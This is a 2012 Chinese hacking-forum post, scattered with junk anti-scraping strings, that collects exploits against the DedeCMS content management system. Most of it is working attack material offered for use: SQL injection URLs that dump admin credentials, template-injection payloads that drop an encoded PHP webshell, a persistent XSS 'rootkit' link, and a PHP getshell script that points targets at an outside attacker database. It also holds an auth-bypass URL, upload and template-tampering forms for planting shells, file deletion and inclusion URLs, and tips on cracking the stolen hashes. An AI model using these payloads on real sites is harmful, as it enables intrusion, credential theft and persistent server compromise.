找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3032|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
7 P' w- e* T4 P8 x0 J
Dedecms 5.6 rss注入漏洞. `; R1 ^( A0 N8 Y
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
9 c* b, Y3 }  u8 I, y% J; S% |! F/ @* ^) ]  X

- K! l- f$ d0 w$ P$ |, v) }
/ i: D5 [3 ^1 f% h: U& Z/ ?7 R
2 H% |; |: s) K( P" g+ [7 N- i8 l6 i# z& F% C! o
" K. j0 c6 D# w. B" f8 i
2 t3 v: [& k: s* K8 @% \

- o6 ?, E/ ]2 R0 c3 D8 PDedeCms v5.6 嵌入恶意代码执行漏洞
6 S1 u$ n: r/ D2 z) E注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
, `; n% E# O: [" T7 q5 W发表后查看或修改即可执行
0 T' p  H+ d8 _+ F0 G# c/ xa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}  d: L; f7 J6 n. e1 \1 t
生成x.php 密码xiao,直接生成一句话。1 `7 p/ }) A! l! v  B

1 k6 ~& e& O: O
. O$ N. b# P4 ?% O: W0 ^) [6 n# p9 U' m* M2 m. a! u

: t0 X3 c" \3 A
1 F0 C$ [( ~9 x+ i2 ~
2 E: E& w; z- E" ?- ~! e% y) Y/ H& Z/ R- a

5 {9 {. z2 Y  A; qDede 5.6 GBK SQL注入漏洞1 L$ _/ n) h& S# z
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';5 f* x9 ~9 K  |  J
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe; C7 G4 u7 R0 }+ ^
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7& N6 ~9 c& D/ }+ d5 g( P$ Z
! o; c$ C6 B) w

- G7 s. D4 ~/ V. C4 g! O. }' b
( v2 M) `8 F/ i( i( K0 I: r+ d: ]+ e" Z/ p6 ?. [
7 h5 P2 ]; T: `& w1 i' L' R. ^
6 o3 |  e9 b' r- p
* s+ D5 ?. o! I3 \, h
) R6 r$ j6 E$ l" z7 r
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞. ~; A" r1 E1 N* O5 a
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 9 _" v  k. }2 C, T
6 Y/ a; C7 r8 o4 h0 l

# s5 x/ _' ~* f# m' K! F- G; Y1 {' k6 \6 f% d8 ]$ M
" a5 G0 g+ k7 X* |/ i. D7 \- Q
- q' @, V. e; Q: q) d, `, V) h

) E9 M& r  E, l" v! |9 S' M+ MDEDECMS 全版本 gotopage变量XSS漏洞
. c* Q: _8 e- B7 r1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
  a- x) w8 s& F* ~1 F
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="' U8 A9 B% n3 W/ t
2 J0 ^' V* `5 v" G

" |3 K6 C3 g" [2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
$ L9 c  z; H0 L9 K9 h
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
0 R! ]1 W/ t3 u) q9 e5 X, C
  x; L# g; M( V9 A% ]) {3 q. v1 @5 b& B& R/ @# z- _
http://v57.demo.dedecms.com/dede/login.php
' k+ m: ^  d5 o* C6 `) f
: C! I; e- z0 R; H. q6 q3 ^% L+ [0 J; P) [/ i9 d$ U
color=Red]DeDeCMS(织梦)变量覆盖getshell
. `! K# |8 K* M, v#!usr/bin/php -w
1 d9 O! [2 ]/ n# G! H3 p<?php- l# y% x1 w! m6 R, j- v' }
error_reporting(E_ERROR);; w( q) o, G& a& [
set_time_limit(0);7 p% x  ~% Y( `! d6 B) l) }3 H- d
print_r('6 j. p6 p, `- i! n- {3 L' X: j2 v
DEDEcms Variable Coverage% @7 w, x( L7 k% f$ n
Exploit Author:
www.heixiaozi.comwww.webvul.com
& k1 r3 T2 U! F0 c, \+ w' S3 L);
$ F4 d: [  P) r2 g. becho "\r\n";! N# d5 a. Z5 m* E' d3 S
if($argv[2]==null){
$ j, b& q5 y- H8 C0 M5 Zprint_r(': V% \2 Y' w- F  P% h$ y
+---------------------------------------------------------------------------+* D$ F2 F4 d! |: o1 i
Usage: php '.$argv[0].' url aid path
" A( |- t6 }& n, f. `* ~, Said=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
; o6 Q. s& u& R/ xExample:% G, @9 E* m* V. k( C( A9 L
php '.$argv[0].'
www.site.com 1 old8 \7 u; D* [3 _- B# L
+---------------------------------------------------------------------------+3 H# ~) _0 d# T. E' z1 S. i
');% i! a0 Z: p, b
exit;& d7 N! t5 F1 o4 _( L
}
4 I8 A4 i' h# H; X. R$url=$argv[1];% Q7 \8 b' Q  d5 M' m4 ^
$aid=$argv[2];
* Z  m/ T" b+ J' |% k5 x$path=$argv[3];
, G) w: D( R$ q! {) O# y$ {9 `6 Q$exp=Getshell($url,$aid,$path);) ~# m; @: \- [  H; c" E( M( V
if (strpos($exp,"OK")>12){
" l2 W9 s4 {1 Z& @4 {) jecho "
+ l* O  p  I& y8 G0 ]Exploit Success \n";7 u& S# P7 R# P! D; [! x. J. {
if($aid==1)echo "
! q# U1 X$ N% y8 `( A* BShell:".$url."/$path/data/cache/fuck.php\n" ;5 S' {+ N9 D+ S  u  _
* P5 g6 [) m/ h0 r5 S* \! Z

5 R; Q% s; ?) n6 }1 cif($aid==2)echo "$ C5 i, @  h* [# }4 E9 V/ z
Shell:".$url."/$path/fuck.php\n" ;' U7 V6 Y' y" P6 t- t+ z
: u, M; @3 u) s

% Z( E' {  {. t7 ]3 b3 I, d: Oif($aid==3)echo "
. n" d& i6 g( S3 I6 U( Z6 J6 v/ rShell:".$url."/$path/plus/fuck.php\n";1 F9 d) h. q$ U1 P) ^3 M
, c) D0 T! s2 ~9 Z
  B. ?/ D, D0 y& T+ }
}else{4 E; Q" D# ~$ m; @
echo "
5 Q  Z! ?; {3 y* a8 n3 {! M2 J0 b& JExploit Failed \n";
, Q6 i. E5 \& |}3 g; x" O: @6 q
function Getshell($url,$aid,$path){- w7 {; H( ~" o- Z6 W6 v
$id=$aid;
& p$ k$ z! z% V+ Z" [& ^7 ]! b$ u. ?$host=$url;
4 j! y, p, r1 T4 Y, T  h$port="80";. R: f4 f5 X& F% j' p3 |! A2 N
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";  J2 Z$ }7 H2 B3 e" ~
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";6 k( a/ L/ Y% ^. _4 n/ w( d6 N$ p
$data .= "Host: ".$host."\r\n";
" K, J% A2 {. m/ g# {7 P' V. {" a2 s$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
8 W# `; ]7 j# J  E7 e$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";7 }- b# C1 p- r' r) O; e5 i
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";6 f9 L# U8 S2 d* D
//$data .= "Accept-Encoding: gzip,deflate\r\n";
9 z! D1 \; y" w- t$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";- d4 N0 x' j' X* G3 F
$data .= "Connection: keep-alive\r\n";  S& S8 k4 b8 x$ W
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
0 j  G8 Z& P# N9 B7 h$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
) R! r5 o4 E$ v, {5 J: i3 |$data .= $content."\r\n";
- i( G$ L: k( q' h$ock=fsockopen($host,$port);
9 Y. b: r, R, t" eif (!$ock) {7 r) i6 z5 w/ k6 O6 \6 M; V9 ?+ M
echo "/ s9 u, @  U" D
No response from ".$host."\n";. v5 b4 q  R1 o' x) F
}
# f% W8 q1 I9 h% W6 h9 W4 Ufwrite($ock,$data);
9 G9 I6 Q& d/ _% C* ~2 _9 Fwhile (!feof($ock)) {
' D0 Z. }- k# S$exp=fgets($ock, 1024);
( N+ |* q' x0 i1 B: A" Oreturn $exp;3 @3 W/ n' f5 }% b, d
}, T7 V2 [" `. m, I9 _/ J" J
}  u4 u7 m, [7 u4 q' C) @/ [
" e, a0 z+ N$ m) D  w( o

8 y9 `' e, O# a& @3 y" Y?>
% m' {3 A7 g$ f# t4 d+ f* r) j5 z

; i- \* g" Y' _! R/ |7 T
: r5 U7 l& m  C( N+ `% F
+ \2 P( U  g8 a( L* a' }0 J( o' V1 D# D3 g7 M8 Q5 v+ A3 h4 {! L% q/ ~

6 c: P& @5 @- [9 N6 u3 v0 H+ E. R! v, Y6 d, J# K8 t

1 K; ^: a9 C/ T2 s' R5 Q# k% m$ D- E" U
" R' O& G9 {( V4 H" {$ S6 g3 o- {
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
4 [% t. W3 s( w3 w* I, m
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root* `3 v: H# i% ^% A4 y; P

+ b* o/ t$ ^6 b8 Y. a0 T9 X! S7 ~0 h; j7 Q3 n
把上面validate=dcug改为当前的验证码,即可直接进入网站后台' K$ v( R3 r* A  V& H+ T7 N
3 C1 y/ L9 _$ T. @5 x

$ Q2 @' z9 V. z此漏洞的前提是必须得到后台路径才能实现
8 W) x  f' D/ e, L8 U
  M5 f' u" y7 W/ c* L5 y5 t$ ?7 }/ R# Y3 g; {
* l+ i  ?5 X- H/ b% \

. P. D9 o' D  T6 g) x& p# H6 z+ b

: ~! q  y6 ~4 K& O: K& c7 X/ _( ^' z2 g2 K1 }8 c: c

* f1 I1 X" X; P1 h+ [
) x* O( K4 S( ]1 l, x8 q! N+ G# a7 n# v  J" c
Dedecms织梦 标签远程文件写入漏洞
$ E, L/ C2 Y0 K# U* {- J) u9 ^前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');  I& ^6 L' ?' M8 m9 C

" `2 l' a8 ~# }9 N1 d7 w- y( ?/ G7 A, W7 R/ C
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 : }1 ~6 p& x5 A0 p
<form action="" method="post" name="QuickSearch" id="QuickSearch">4 Z8 p" `! L; |
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /># F" O2 p2 ]! S
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
2 E* o1 W- h6 M2 g9 }" T<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />, D0 S. S# I0 F  J. Z( f4 o* W
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
! Q1 P! q/ [7 g  l- z/ x<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
, ]( y7 B9 h- P3 i<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />% q, F6 a- B; B# b2 `7 m
<input type="text" value="true" name="nocache" style="width:400">6 i# {! c  h. B; M! I- N
<input type="submit" value="提交" name="QuickSearchBtn"><br />
5 k3 M* o7 O7 V& e</form>* ]: z& t! F  l( z& \( l
<script>+ @' I8 r+ i4 @  Y! g
function addaction()
( Q" L' n- k* Q( X{& s7 Q, G& s( x
document.QuickSearch.action=document.QuickSearch.doaction.value;
% k$ n" u, G) y8 I) a. }3 F}
- a, t* K3 p& J. Q</script>
; Z5 V: t6 E: D4 @, u4 b3 O* T+ O+ o' s* w
' R6 T1 F$ j" W! U5 F

' G+ P/ @( }0 _; Q8 q# N
: }* ]! _3 r! S& j" p" T+ [, h9 a# W) G

& r/ O$ O* m7 i2 M) y7 G8 x. s, B0 s; C& t) m9 h

2 }* U& R3 J6 z8 b/ T% e6 C  w8 r! m. j2 V0 p* g3 K* F, q

- G9 q+ Y* B/ y' d; |4 UDedeCms v5.6 嵌入恶意代码执行漏洞3 f6 N7 k" h5 h
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
, n, |( R4 T! ia{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}/ ]4 U9 v8 ?" z6 u
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得: B6 q+ V# D) J, W
Dedecms <= V5.6 Final模板执行漏洞/ ?5 m1 A; G: y1 x7 ]
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:% O# M0 ~6 F) W2 k
uploads/userup/2/12OMX04-15A.jpg
7 Y, C9 T9 W" g) i$ n6 F9 U
2 _- E7 S" P9 Y* ]  T5 n3 T3 O
模板内容是(如果限制图片格式,加gif89a):6 ~: M( D" C" W' Q
{dede:name runphp='yes'}* L3 \/ `* N3 ~' ?8 N- \) [( }
$fp = @fopen("1.php", 'a');; q+ i) _4 |* e- d$ t! a+ R% a
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
" t: K8 o: N7 j  s) _4 v1 J9 i* S" ?@fclose($fp);
$ A* h4 _. I# g{/dede:name}2 g- \( |! `8 x9 {  D$ r( t
2 修改刚刚发表的文章,查看源文件,构造一个表单:& r6 \9 j1 v  S; ^* D; j' X4 m
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data"># a( G2 n) g0 M
<input type="hidden" name="dopost" value="save" />
2 z$ z9 u, ^, u5 z  Q; x<input type="hidden" name="aid" value="2" />
5 J/ E5 X: P: ?8 p  j, P<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
3 U7 C8 `' Z1 X, k4 m5 ]& K<input type="hidden" name="channelid" value="1" />" v  G% Z% t% N+ y
<input type="hidden" name="oldlitpic" value="" />
0 q+ w$ r! `& f! M& r<input type="hidden" name="sortrank" value="1275972263" />
1 x/ O. p: t" f* w+ M3 A: M. e5 T9 f! B7 p8 ]  {

6 q  R0 v' x1 d: R1 r. ]<div id="mainCp">5 X, U- X8 q' w4 \) {
<h3 class="meTitle"><strong>修改文章</strong></h3>% A$ d0 c- o7 N) m3 w- [, G/ S
; P5 r4 y" k' o( \; b; s

% ^8 s" a6 Z! W8 S' O<div class="postForm">) x' n, _' f/ j6 P4 G
<label>标题:</label>0 Y1 l2 u) V( J, ^, x0 W0 Y5 K8 ?
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>( z9 Z+ P; v. t: A

8 b  Y, o4 F  J8 E8 H4 F6 J: r. J: v8 H( {" l  }& H* J3 o
<label>标签TAG:</label>
  T5 X, D8 P5 B: ?4 u" d; W& u<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
* e& G, R& n; x% o! T3 x* }- T  ?  G2 R( @( X2 T: u
+ C4 y* k8 j- C) ~
<label>作者:</label>
5 z7 b3 h$ O/ v5 V" t. f0 N' j& P<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>9 y- f, v( w2 N3 Z! ?7 Z

: Z: }& k8 e; A, g/ K+ S
  o3 C* _& V& s2 x: W( j- ]<label>隶属栏目:</label>
0 M% e: E. S3 \1 C( |% b<select name='typeid' size='1'>
: L/ R! \! ^0 |) q2 {<option value='1' class='option3' selected=''>测试栏目</option>
. p8 g- x5 V3 }+ R5 a</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
  l/ b4 n: N7 _1 H: Q5 Q/ m: Q; m* @! z( H6 {
! t0 a& _: l' i+ U: Z$ N
<label>我的分类:</label># r5 ~# I- J  d7 s# e! U9 B
<select name='mtypesid' size='1'>: s' s1 J+ w# |6 t
<option value='0' selected>请选择分类...</option>
1 y6 ?  P# N0 I' E3 o$ A" r<option value='1' class='option3' selected>hahahha</option>
' F) u/ @( C) S0 P* y+ t% Z& x</select>8 \2 u3 f% s8 E7 a; j

* }7 ~8 m# x1 t' }" l6 Q1 y9 O
; Y" J6 K$ z2 y! X6 P  ?+ O3 H<label>信息摘要:</label>" |+ }2 d# a. C+ r) J
<textarea name="description" id="description">1111111</textarea>
. ^) R# k( B& s4 y& [(内容的简要说明)
2 w, a3 y6 B+ G- i- [/ B1 g# d9 R' _4 h, x( x% H

# ]" g- K5 C4 X# Y. ]; d; M0 G<label>缩略图:</label>0 d8 B$ ~9 i' ^
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
/ Z+ O) b% X& j+ s3 @) V
/ B+ ^! e, O) \( N
( ?# R, E* q8 N3 i4 h* k' N- Y. a<input type='text' name='templet'
" c6 X2 \, U6 g+ v: h2 p5 Tvalue="../ uploads/userup/2/12OMX04-15A.jpg">
1 e; g" c0 X# D0 E5 n<input type='text' name='dede_addonfields'
# e2 R6 ]* K' m* bvalue="templet,htmltext;">(这里构造)$ U6 I2 q! @4 H
</div>
& j% j) @/ Y) [) T9 I' z
8 b- c6 x  k' _8 U7 ~5 f* [
: b5 R; z8 @9 [& j<!-- 表单操作区域 -->5 n, w  e2 o! O6 j0 T3 ^1 {
<h3 class="meTitle">详细内容</h3>' j; y/ c) s& l- }: m

6 a# F" v/ L; X( v' [& V3 W. R: W
" n- b7 O8 u( k# R<div class="contentShow postForm">
$ [, A( e- Y1 u" c. ]<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe># c( [3 H( @4 {
5 `: D# m; f! |! ?& ^4 f. c

! D* J7 C. S8 Q% V3 M/ U4 X<label>验证码:</label>
# M' l8 c' S- s& g4 L+ b$ I& O<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />) r! n) }8 F( h  r' {" c; f
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
/ ]5 Y( F& p% P" [: |5 ]1 v
1 S0 P& y1 k  S+ W
4 L% |# U5 r7 t7 |! D<button class="button2" type="submit">提交</button>- e0 J! t% a4 h
<button class="button2 ml10" type="reset">重置</button>
/ k/ T, b1 Q4 s2 i</div>
6 F% _1 h! L8 ^4 m+ I* a2 Z
5 J' }9 Z- r/ v7 w1 ?3 i; S) L+ x1 A1 U. s( @1 t/ S
</div>! S/ |/ L1 B( v  R, n

, @* l" Z3 R  h
8 w" V# ^. q: ]: A4 ]# ?! D8 M</form>' T$ x7 J3 W+ J* ^  W! ?" _9 j5 e  q

; N& H' b0 C- u; }$ ]& S8 _0 \7 @/ w% _) E. M
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
/ p, G( _2 m; I/ O( l' e假设刚刚修改的文章的aid为2,则我们只需要访问:4 W7 c$ D# R) g4 u/ b
http://127.0.0.1/dede/plus/view.php?aid=2& A+ r: J) z7 U) C- D" M
即可以在plus目录下生成webshell:1.php3 N( p' b3 M4 R+ A# v, ]
- c+ A( n: F1 z  {

, ?6 Q  v& r4 A; N3 R* J' n6 m: M- l4 b3 r
/ m8 M+ G1 P& {! \$ N9 X9 }* w
3 ~! [5 ?. P2 Y% {  r  g+ u

& H- _; i, R  Q7 z7 Q, n8 |5 [/ h1 d0 J; T( }3 R" }( u- ]
" w) m& j/ y  w8 v0 M% F4 i4 M2 F

" Y5 G9 y# D2 O1 x! r& j. N
9 s: c3 l4 R$ H0 r8 u
, i# }+ x% J9 i( ^3 z$ \5 _' l. ]( t  e" P$ V) G
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
3 ^; V$ O( P% ~9 T+ ]4 ~Gif89a{dede:field name='toby57' runphp='yes'}  M5 Z. t0 U1 }/ Y! T
phpinfo();  l* F. t0 U  p4 u" I
{/dede:field}, K" C! v3 H7 U$ S$ D4 V: M
保存为1.gif
6 d$ Q* z. g( y) _6 E) |<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 5 G! O. h9 Y* _; m* ]' G
<input type="hidden" name="aid" value="7" /> 8 q. u8 w7 b4 M* n* ?9 E/ U7 e* M
<input type="hidden" name="mediatype" value="1" />   d& k6 P, G3 R! S" W+ D8 [* d$ S& e
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
: Z) S3 z' g- |! p<input type="hidden" name="dopost" value="save" /> 9 Z' f  {) z9 s; I( t* @4 Q
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
& W; e9 \$ C! I<input name="addonfile" type="file" id="addonfile"/>
  V/ j+ C0 U! e! G4 X" T<button class="button2" type="submit" >更改</button> + @. T' U7 N" \, Z# }3 W7 [
</form>
% a6 u* p  [4 E4 a  B% o' ^" v% ^- z( l# j3 d
  I6 f  t9 M0 p7 z# b: s
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif" r7 ?! A) N8 K- o' L  q2 G  I( `
发表文章,然后构造修改表单如下:9 ?, P8 k, P6 d- U/ N. K+ L9 _0 X
) o$ o/ w9 H) H2 A

: k, i9 o9 q. ^6 }4 t3 \  a: \/ }<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
  \5 ]5 Z! W+ c$ p, P<input type="hidden" name="dopost" value="save" /> 2 Q$ h2 m5 x% E+ C6 o5 v
<input type="hidden" name="aid" value="2" /> - D% @# \0 M7 |6 U0 R
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 6 s: p( V' ~$ Q  w+ u. U
<input type="hidden" name="channelid" value="1" />
! e, Z" ?% ]; L! b3 B3 |- b( N; i4 F<input type="hidden" name="oldlitpic" value="" />
9 O: B6 ?& P' o: @, ~" i( o$ F<input type="hidden" name="sortrank" value="1282049150" />
- w; ^; s" q% e0 H0 ?<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
* V  U+ [: N% f1 O0 _5 q: |5 A<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 4 O# `3 B3 [; v( U  w3 E
<select name='typeid' size='1'> ( s0 N! [# e6 D5 H$ ~
<option value='1' class='option3' selected=''>Test</option>
6 m5 ~5 h8 r* \, j" L<select name='mtypesid' size='1'>
$ V  T/ |1 v$ i1 ]3 ?( ?+ ^<option value='0' selected>请选择分类...</option> ( V. x4 Y, o: {/ \, K  s4 _/ ^4 g
<option value='1' class='option3' selected>aa</option></select> * U9 e! Z; E: l; c- Z
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
2 b$ D; Y1 \3 y7 _5 `<input type='hidden' name='dede_addonfields' value="templet">
8 j0 e: K2 h% ]8 n: ^; k. v<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
9 Q' [( w% K4 L$ S# `1 o) j<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
' b' e& k) W# p0 i; n1 D" J; B<button class="button2" type="submit">提交</button> ) s6 U) P) O4 J1 b" a/ t! I5 s
</form>' W/ o- n4 A8 `" p( R

0 _; S* u7 H% F6 g( O2 n- C* g2 C4 V: W, g$ ^; x4 h/ j

, p6 o2 I8 ?4 ~( F. a0 I" p
6 H! h/ p- j1 u4 ]
; U& K$ s5 i+ C9 i" V
% N0 E$ I2 w( r- D, n
6 O/ k* v9 A* F: S" N# T0 r3 n* \, N1 U, z( R$ A( S
; Z7 Z; e1 y0 Y! m& V. J7 }
$ o: _& s" a0 y- _* m7 m9 i' r8 o1 I
9 t$ `" I. h! Y- N

  m& c$ u& W. B- m) }9 D织梦(Dedecms)V5.6 远程文件删除漏洞
0 z9 L- q. d1 h, v
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
$ I2 Q: U8 |) Z& b
# K3 o0 j! j8 l5 W, m
) g8 f7 h5 X/ }/ O- q4 k/ N: J0 i( b1 |
3 E9 I" Q: Y' h; q% G

2 c4 Z9 U% x9 t& A/ {& j
- {( V' m- K4 J7 l3 A! E  x0 Q# R# L$ t2 U" Y, G% ?7 B1 ]9 L* {- J
# W+ T! x% c! u, c* I7 y. Y

1 ^1 q/ E. |# L7 \, X
% Y$ F- H1 T1 s# x2 Y6 l* Q织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
# w- R* w' R' b. g* z
http://www.test.com/plus/carbuya ... urn&code=../../1 t( D( e% p# P. S" P1 v

+ K5 G* W; j9 V% g; {- h) m
! Z. `( X: W# s
' n8 I5 ~* B) z: `$ |, ^* K8 t4 i

$ p$ e& j! F) Z
& H  g( @; K' V; H; K2 g& P3 A2 e( ^9 T5 @$ T0 x

% V5 r: u) E- Y6 c  g+ N$ n+ Q6 T1 v4 X" y" j# p( c$ h/ N
9 D9 n) `" y' p) C: T' ~4 i4 \
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
: {3 x- b# H4 k2 pplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`0 c+ C, {$ t3 E7 V( {0 G; a
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
% R$ Y& H% h3 [" a
. V% w& z0 t) F8 j( Z
8 [/ l1 d- s, m. \% P9 C$ N; ~. [8 m0 d& H# b& e+ W
' A  f+ }% S& c( ]
4 I2 Y- m$ W8 l" D) s

7 k/ }: H. [$ v) S. g+ ]7 S  v  L: L! D+ o- T5 G! \; k

, n6 {! `2 S% N* ?1 D
% s3 Q. p3 A3 o8 s( a! \! Z% p3 _" }. B
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞9 N% F# p2 z' g. N
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
7 M  y# n8 t: S& k/ D6 x3 ]
6 U- z# T4 Z" U1 M6 J5 k8 i8 l: ^& c! L% U
% B% |( J2 q% L4 C# d& M

* j4 `3 u' u1 U1 |- ]- Q+ N6 J( F6 l  m8 R; ]

